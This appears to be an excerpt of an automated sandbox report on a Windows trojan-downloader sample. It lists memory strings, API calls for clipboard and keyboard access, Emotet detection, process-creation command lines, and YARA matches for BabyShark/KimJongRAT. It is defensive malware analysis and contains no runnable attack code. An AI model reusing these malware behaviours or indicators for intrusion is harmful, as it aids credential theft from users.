                Source: msfeedsbs.exe, 00000007.00000002.277278118.000000000019C000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msfeedsbs.exe, msfeedsbs.exe, 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000C.00000002.306452776.000001735144E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 0000000C.00000003.305945195.0000017351441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000C.00000003.305945195.0000017351441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000C.00000002.306452776.000001735144E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000C.00000003.281205822.0000017351432000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: msfeedsbs.exe, 00000007.00000003.277194814.0000000000B59000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                Source: msfeedsbs.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: svchost.exe, 00000016.00000003.390656164.0000019D2DF9B000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.390583328.0000019D2DF69000.00000004.00000001.sdmpString found in binary or memory: https://support.hotspotshield.com/
                Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.306386180.0000017351413000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.281205822.0000017351432000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.305707964.0000017351440000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.281205822.0000017351432000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000C.00000002.306422023.000001735143B000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000C.00000002.306452776.000001735144E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: svchost.exe, 00000004.00000002.500442562.000002116DE0E000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: msfeedsbs.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: svchost.exe, 00000016.00000003.390656164.0000019D2DF9B000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.390583328.0000019D2DF69000.00000004.00000001.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                Source: svchost.exe, 00000016.00000003.390656164.0000019D2DF9B000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.390583328.0000019D2DF69000.00000004.00000001.sdmpString found in binary or memory: https://www.pango.co/privacy
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_00401131 SendMessageA,GetKeyState,GetKeyState,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,CloseClipboard,0_2_00401131
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_00401131 SendMessageA,GetKeyState,GetKeyState,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,CloseClipboard,0_2_00401131
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0044082C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_0044082C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004528D7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,0_2_004528D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004528EC GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_004528EC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0043CDD3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0043CDD3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0044082C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0044082C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004528D7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,1_2_004528D7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004528EC GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_004528EC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0043CDD3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_0043CDD3

                E-Banking Fraud:

                barindex
                Emotet Banking Trojan foundShow sources
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
                Source: unknownProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'Jump to behavior
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeProcess created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'Jump to behavior
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000000.00000002.231168035.0000000002251000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.270006445.0000000003A99000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.266563770.000000000284D000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.503038920.0000000003E20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.502949640.0000000003C70000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.498794424.00000000024A1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.502327978.0000000003400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.267006289.0000000002893000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.231153327.0000000002240000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.269875775.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.498766508.0000000002490000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.msfeedsbs.exe.3e20000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.msfeedsbs.exe.3c70000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.msfeedsbs.exe.3400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.msfeedsbs.exe.3e20000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.msfeedsbs.exe.3c70000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.msfeedsbs.exe.3400000.3.unpack, type: UNPACKEDPE

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 00000001.00000003.278055730.0000000003FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 00000009.00000001.273628846.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.2.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 1.3.msfeedsbs.exe.3ff0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 1.3.msfeedsbs.exe.3ff0000.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.1.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.1.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.2.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,7_2_0040A5A9
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,7_1_0040A5A9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeFile created: C:\Windows\SysWOW64\msi\Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeFile deleted: C:\Windows\SysWOW64\msi\msfeedsbs.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0041A0B60_2_0041A0B6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004102C60_2_004102C6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004104A30_2_004104A3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0042A5900_2_0042A590
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0043F5130_2_0043F513
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_00421A1F0_2_00421A1F
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0041A0B61_2_0041A0B6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004102C61_2_004102C6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004104A31_2_004104A3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0042A5901_2_0042A590
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0043F5131_2_0043F513
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_00421A1F1_2_00421A1F
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_004038A56_2_004038A5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_004094706_2_00409470
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_0040123E6_2_0040123E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_004010B46_2_004010B4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_0040C0BC6_2_0040C0BC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_00409F546_2_00409F54
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_004083256_2_00408325
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_004099E26_2_004099E2
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_2_0040B1F76_2_0040B1F7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_004038A56_1_004038A5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_004094706_1_00409470
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_0040123E6_1_0040123E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_004010B46_1_004010B4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_0040C0BC6_1_0040C0BC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_00409F546_1_00409F54
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_004083256_1_00408325
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_004099E26_1_004099E2
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 6_1_0040B1F76_1_0040B1F7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_004360CE7_2_004360CE
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_0040509C7_2_0040509C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_004051997_2_00405199
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_0043C2D07_2_0043C2D0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_004404067_2_00440406
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_0040451D7_2_0040451D
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_004045FF7_2_004045FF
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_0040458E7_2_0040458E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_004046907_2_00404690
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00414A517_2_00414A51
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00404C087_2_00404C08
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00406C8E7_2_00406C8E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00415DF37_2_00415DF3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00416E5C7_2_00416E5C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_00410FE47_2_00410FE4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_004360CE7_1_004360CE
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_0040509C7_1_0040509C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_004051997_1_00405199
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_0043C2D07_1_0043C2D0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_004404067_1_00440406
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_0040451D7_1_0040451D
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_004045FF7_1_004045FF
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_0040458E7_1_0040458E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_004046907_1_00404690
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_00414A517_1_00414A51
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_00404C087_1_00404C08
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_00406C8E7_1_00406C8E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_00415DF37_1_00415DF3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_00416E5C7_1_00416E5C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_00404DE59_2_00404DE5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_00404E569_2_00404E56
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_00404EC79_2_00404EC7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_00404F589_2_00404F58
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_0040BF6B9_2_0040BF6B
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_00404DE59_1_00404DE5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_00404E569_1_00404E56
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_00404EC79_1_00404EC7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_00404F589_1_00404F58
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_0040BF6B9_1_0040BF6B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: String function: 004134C8 appears 275 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: String function: 00412B98 appears 48 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: String function: 00455D09 appears 38 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 004134C8 appears 277 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00444C5E appears 36 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 004053C5 appears 34 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 0040924D appears 57 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 0042FF22 appears 32 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 004166E8 appears 68 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00416A91 appears 174 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00455D09 appears 38 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00404880 appears 42 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00445190 appears 70 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00416849 appears 127 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00412360 appears 36 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00444C70 appears 40 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00412084 appears 78 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00411FF2 appears 36 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00412072 appears 32 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: String function: 00412B98 appears 48 times
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: msfeedsbsoe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: msfeedsbsoe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: msfeedsbsoe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.230625431.0000000000493000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.231146677.0000000002230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.232454394.0000000003040000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.232454394.0000000003040000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.231993276.0000000002F40000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeBinary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 00000001.00000003.278055730.0000000003FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 00000009.00000001.273628846.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 9.2.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 1.3.msfeedsbs.exe.3ff0000.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 1.3.msfeedsbs.exe.3ff0000.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 9.1.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
